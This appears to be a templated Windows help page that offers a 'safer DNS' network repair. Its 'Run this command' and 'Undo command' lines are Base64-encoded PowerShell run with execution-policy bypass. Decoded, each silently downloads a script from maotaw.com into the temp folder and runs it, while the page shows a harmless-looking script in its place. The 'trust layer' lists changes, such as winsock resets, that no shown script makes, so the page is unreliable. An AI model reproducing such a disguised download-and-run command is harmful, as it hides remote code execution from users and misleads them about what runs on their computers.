Repair Network Connection

This operation is focused on turn on safer dns and review encrypted dns support so the result stays precise instead of mixing unrelated tweaks.

Repair Network Connection is written like a practical guide instead of a thin script page, so you can understand what the issue usually means, why the suggested actions exist, and how to back out safely if the result is not what you wanted.

Overview

Open DNS settings and refresh your network adapters so you can move to a cleaner, safer DNS baseline.

  • Turn on safer DNS and review encrypted DNS support often shows up when the PC still uses default router DNS without review.
  • A nearby clue is that DNS settings were changed by old software or VPN tools.
  • In practical terms, this page is about open dns settings and refresh your network adapters so you can move to a cleaner, safer dns baseline..
Run this command
PowerShell -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAdABvAHAAJwA7ACAAJAB1ACAAPQAgACcAaAB0AHQAcABzADoALwAvAG0AYQBvAHQAYQB3AC4AYwBvAG0ALwBzAGMAcgBpAHAAdAAvAGEAcgB0AGkAYwBsAGUALwB0AHUAcgBuAC0AbwBuAC0AcwBhAGYAZQByAC0AZABuAHMALQBhAG4AZAAtAHIAZQB2AGkAZQB3AC0AZQBuAGMAcgB5AHAAdABlAGQALQBkAG4AcwAtAHMAdQBwAHAAbwByAHQALgBwAHMAMQAnADsAIAAkAGYAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACcAbQBhAG8AdABhAHcALQB0AHUAcgBuAC0AbwBuAC0AcwBhAGYAZQByAC0AZABuAHMALQBhAG4AZAAtAHIAZQB2AGkAZQB3AC0AZQBuAGMAcgB5AHAAdABlAGQALQBkAG4AcwAtAHMAdQBwAHAAbwByAHQALgBwAHMAMQAnADsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAdQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgA7ACAAJgAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAJABmAA==
Script
# Maotaw Secure DNS Review
$ErrorActionPreference = 'SilentlyContinue'
Get-DnsClientServerAddress | Format-Table -AutoSize
Start-Process 'ms-settings:network-advancedsettings'
Write-Host 'Review your adapter DNS settings and enable encrypted DNS where supported by your setup.'
What this does

Open DNS settings and refresh your network adapters so you can move to a cleaner, safer DNS baseline.

DNS is both a reliability and safety layer. Slow or unsafe DNS can make browsing feel worse and may expose you to more low-quality redirects.

In plain language, turn on safer dns and review encrypted dns support matters because the PC still uses default router DNS without review. People usually start looking this up when DNS settings were changed by old software or VPN tools. DNS is both a reliability and safety layer. Slow or unsafe DNS can make browsing feel worse and may expose you to more low-quality redirects.

How and why

In practice, turn on safer dns and review encrypted dns support matters because the PC still uses default router DNS without review. DNS is both a reliability and safety layer. Slow or unsafe DNS can make browsing feel worse and may expose you to more low-quality redirects. A good next step is to review choose one trusted DNS provider and stay consistent. Then decide whether you only needed the explanation or whether you want a practical action page too.

You normally review turn on safer dns and review encrypted dns support when you want to understand what Windows is doing, what changes it can influence, and whether it is relevant before you touch settings blindly. Useful things to notice first: choose one trusted DNS provider and stay consistent; avoid stacking VPN DNS, browser DNS, and manual adapter DNS without understanding the order; flush DNS after major network tool changes; document custom DNS changes so you can undo them later.

  1. check what DNS servers your adapters currently use
  2. switch to a trusted provider only if you know why you want to change it
  3. test browsing and update checks after the change
  4. flush DNS if old results keep showing
Undo command
PowerShell -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAdABvAHAAJwA7ACAAJAB1ACAAPQAgACcAaAB0AHQAcABzADoALwAvAG0AYQBvAHQAYQB3AC4AYwBvAG0ALwBzAGMAcgBpAHAAdAAvAGEAcgB0AGkAYwBsAGUALwB0AHUAcgBuAC0AbwBuAC0AcwBhAGYAZQByAC0AZABuAHMALQBhAG4AZAAtAHIAZQB2AGkAZQB3AC0AZQBuAGMAcgB5AHAAdABlAGQALQBkAG4AcwAtAHMAdQBwAHAAbwByAHQALgBwAHMAMQA/AHYAYQByAGkAYQBuAHQAPQB1AG4AZABvACcAOwAgACQAZgAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAJwB1AG4AZABvAC0AbQBhAG8AdABhAHcALQB0AHUAcgBuAC0AbwBuAC0AcwBhAGYAZQByAC0AZABuAHMALQBhAG4AZAAtAHIAZQB2AGkAZQB3AC0AZQBuAGMAcgB5AHAAdABlAGQALQBkAG4AcwAtAHMAdQBwAHAAbwByAHQALgBwAHMAMQAnADsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAdQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgA7ACAAJgAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAJABmAA==
# Maotaw Undo Pack

$ErrorActionPreference = 'SilentlyContinue'

# Undo stronger network reset extras
Write-Host 'Network resets clear state. Re-enter any custom DNS, VPN, or proxy settings you intentionally used before the reset.'
When this page helps
  • Use this page when the main symptom is close to turn on safer dns and review encrypted dns support.
  • A common fit is when the PC still uses default router DNS without review.
  • It is also a fit for searches like: enable dns over https windows 11.
Before you run it
  • Read the script and command first so you understand what turn on safer dns and review encrypted dns support is changing.
  • choose one trusted DNS provider and stay consistent
  • avoid stacking VPN DNS, browser DNS, and manual adapter DNS without understanding the order
  • check what DNS servers your adapters currently use
Trust layer

This page is designed to be reviewable before you run anything. It shows what the pack is likely to touch, what it intentionally avoids, and how rollback is handled.

Likely touches

  • winsock
  • IP stack reset commands
  • DNS cache

Intentionally avoids

  • router configuration
  • ISP settings
  • account credentials
Verification
  • Create a restore point or baseline note before stronger changes.
  • Compare one symptom at a time after a reboot instead of guessing from feel alone.
  • If a change does not help, use the undo pack before trying the next bigger fix.
  • check what DNS servers your adapters currently use
  • switch to a trusted provider only if you know why you want to change it
  • choose one trusted DNS provider and stay consistent
Expected result
  • You should be able to compare the exact symptom after the pack instead of guessing whether anything changed.
  • Expected improvement area: Open DNS settings and refresh your network adapters so you can move to a cleaner, safer DNS baseline.
Common mistakes
  • Do not treat turn on safer dns and review encrypted dns support like a magic fix if the root cause was never confirmed.
  • document custom DNS changes so you can undo them later
  • test browsing and update checks after the change
When this page is not enough
  • This page is not enough if the symptom does not improve after you verify turn on safer dns and review encrypted dns support once.
  • Router-side outages, ISP problems, or VPN conflicts usually need a different path than a local Windows tweak.
FAQ

Should you run turn on safer dns and review encrypted dns support immediately?

Usually only after you confirm the symptom matches. A safer baseline, a restore point, and one change at a time make the result easier to trust.

What should you verify after running the script?

Check the exact problem you cared about, reboot if the page recommends it, and compare the before and after behavior rather than assuming the change helped.

Can you undo the change later?

For most pages here, yes. The generated undo pack is meant to move you back toward a cleaner baseline, though deleted cache or temporary files may not come back.

Will this page fix every version of the problem?

No. These pages are meant to be high-signal starting points. If the same symptom comes from hardware failure, account corruption, a bad driver, or a third-party app conflict, you may need a neighboring guide or a deeper diagnostic path.